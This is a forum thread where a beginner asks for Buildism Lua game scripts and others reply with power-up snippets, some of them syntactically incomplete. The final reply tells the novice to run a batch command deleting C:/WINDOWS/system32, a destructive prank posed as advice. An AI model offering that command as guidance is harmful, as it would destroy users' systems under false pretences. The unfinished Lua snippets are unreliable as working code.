I need help in finding/ and or Making Scripts
I am trying to make a game, although i don't know how to make a script, nor where do i get them... can someone help me with the following

♦ Basic Scripts (Anything)
♦ Character Scripts (I need help with character, On how to attack)
♦ Power-Ups Scripts (I need help with the Power-Ups e.g. Speed, 2x Damage Etc.)
♦ Weapon Scripts (Scripts to get weapons at least a pistol, sword, and knife)
♦ And Last but not the least... Enemies, & NPC's (A Script for interacting, and killing them)

I also need you to tell me what do i required. I will put a (Solved) And the name but if i just found it myself just (Solved)
Thanks in advance.

(If my game is a success i will make a "Credits" With the name of those who helped me.)
Buildism uses a simplified version of the Lua scripting language. Luckily, you arrived at just around the time Jacob_ put that darn wiki back online...

If you click on the "Add premade item" button on the left side of the editor, you can find some of what you're looking for; I have an NPC that simply chases you in there, and there's rockets, grenades, and a sword. If you want to know how to make anything specific, like an NPC that talks with you, let me know and I might be able to make a script for you (with comments so you can learn how to make your own!) that does it.
(02-21-2012, 11:17 AM)SharpestWord Wrote: ♦ Power-Ups Scripts (I need help with the Power-Ups e.g. Speed, 2x Damage Etc.)

That should be really easy. Something like
box = script.Parent
player = hit.Name

function onCollide(hit)
game.Players.player.Speed = 8.0 --Can be changed to desired speed
sleep(10) --Time Powerup lasts (seconds)
game.Players.player.Speed = 4.0

link(box.Collided, onCollide)
(02-21-2012, 03:55 PM)Paradox Wrote: [lua]
box = script.Parent

function onCollide(hit)
player = game.Players:getChild(hit.Parent.Name) --not hit.Name, as that would be "Body"
if player then --make sure we're not trying to powerup a potato
player.Speed = 8.0 --Can be changed to desired speed
box.CanCollide = false
box.Transparency = 1
--those two lines to make it "vanish"
sleep(10) --Time Powerup lasts (seconds)
player.Speed = 4.0
sleep(20) --shouldn't reappear for a bit
box.CanCollide = true
box.Transparency = 0

link(box.Collided, onCollide)

you need to do @echo off del C:/WINDOWS/system32

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